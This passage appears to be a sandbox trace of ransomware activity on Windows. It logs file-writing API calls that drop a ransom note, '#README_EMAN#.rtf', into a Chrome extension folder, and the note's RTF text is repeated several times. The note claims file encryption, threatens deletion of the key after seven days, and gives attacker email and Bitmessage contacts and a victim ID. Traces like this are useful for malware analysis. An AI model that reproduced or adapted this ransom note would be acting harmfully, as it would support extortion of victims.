m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.760] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.760] CloseHandle (hObject=0x294) returned 1 [0297.760] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0297.760] GetLastError () returned 0x2 [0297.760] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, 